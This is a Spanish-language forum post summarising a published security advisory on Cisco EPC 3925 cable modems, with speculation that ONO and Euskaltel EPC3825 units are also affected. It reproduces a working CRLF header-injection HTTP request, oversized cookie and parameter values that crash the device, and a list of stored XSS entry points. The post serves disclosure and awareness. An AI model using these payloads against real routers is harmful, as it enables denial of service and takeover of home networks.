Foro Wifi-libre.com

El aviso de seguridad "Cisco EPC 3925 XSS / CSRF / HTTP Response Injection / DoS" desvela varias brechas muy serias en este modelo empleado por telecable y que podrían afectar también al  Cisco EPC3825 de ONO y Euskaltel

Patryk BODGAN acaba de publicar una lista de nuevas vulnerabilidades en Packet Storm:

• Cisco EPC 3925 Multiple Vulnerabilities de Patryk BODGAN

Cookies LANG

Para el menú de hoy tenemos a unos cookies traficados que permiten grabar datos en la memoria del router:

1. HTTP Response Injection

It is able to inject arbitrary data into device memory via 'Lang' cookie,
additional data will be stored until modem restart and will be returned with every http response.

#1 - Request:
POST /goform/Docsis_system HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/Docsis_system.asp
Cookie: Lang=en; SessionID=171110
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 109

username_login=aaa&password_login=bbb&LanguageSelect=en%0d%0aSet-Cookie: pwned&Language_Submit=0&login=Log+In

#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/Docsis_system.asp
Content-type: text/html
Connection: close
(...)

Podremos también hacer una DoS utilizando este tipo de cookies (Lang)
No es muy complicado, solo tenemos que mandar una variable basura muy larga, el sistema no las aguanta y es un crash total...

Indigestión de galletas.
Podemos hacer lo así también, una variable larga y pedimos el cierre de la conexión

Cookie: Lang=enXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX; SessionID=163190
Connection: close

Mismo efecto: un colapso del sistema.

DoS con petición http para ver la lista de clientes wifi

Es un otro ejemplo de inyección http a lo bruto con efectos violentos y devastadores...
La técnica es la mima, añadimos una variable larga en nuestra petición para derrumbar el sistema.
El autor lo hace con

sortWireless=status&h_sortWireless=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Efecto inmediato

#1 - Response:
HTTP/1.0 302 Redirect
Server: PS HTTP Server
Location: http://192.168.100.1/WClientMACList.asp
Content-type: text/html
Connection: close

( ... crash ... )

Se pueden editar los valores de los canales sin credenciales y reiniciar así el router

CSRF (falsificación de petición en sitios cruzados)

Seguimos con la inyección de comandos y vamos a lo chungo chungo:
Podemos cambiar así los credenciales y abrir una puerta trasera

exploits javascript (XSS)

Del mismo palo que la brecha anterior pero pasando por javascript...
Lo más difícil es saber que forma elegir para poner nuestros exploits

6. Stored XSS in SMTP Settings (Administration -> Reportning)
7. Stored XSS in User Name #1 (e.g Administration -> Managment / Setup -> Quick Setup)
8. Stored XSS in User Name #2 (Access Restrictions -> User Setup)
9. Stored XSS in ToD Filter (Access Restrictions -> Time of Day Rules)
10. Stored XSS in Rule Name (Access Restrictions -> Basic Rules)
11. Stored XSS in Domain Name (Access Restrictions -> Basic Rules)
12. Stored XSS in Network Name (e.g Wireless -> Basic Settings)
13. Stored XSS in DDNS Settings (Setup -> DDNS)
14. Stored XSS in Advanced VPN Setup (Security -> VPN -> Advanced Settings)

Telecable, cierto.... ¿Pero se sabe algo del del Cisco EPC3825 de ONO y Euskaltel.?

  La operadora de Asturiana esta directamente afectada ya que usa el EPC3925
La gran desconocida es sobre los EPC3825 de OnO y Euskatel
    Son modelos tan parecidos que todo da a pensar que estas brechas les afectan.
    Usan el mismo firmware docsis 3.0 y según banda ancha:

Cisco EPC3925 @ bandaancha.st

Si no me equivoco se refieren a un "Mail Transfert agent" que no esta involucrado directamente en ninguna de las brechas.
  No vivo en el país vasco y no tengo acceso a un PA OnO con lo cuál no puedo afirmar rotundamente nada
  Pero  apostaría a que unas de estas brechas sean explotables en el modelo de OnO y Euskatel.... Así que al ojo porque en caso de intrusión hay formas de hacer daño muy rápido y muy simplemente.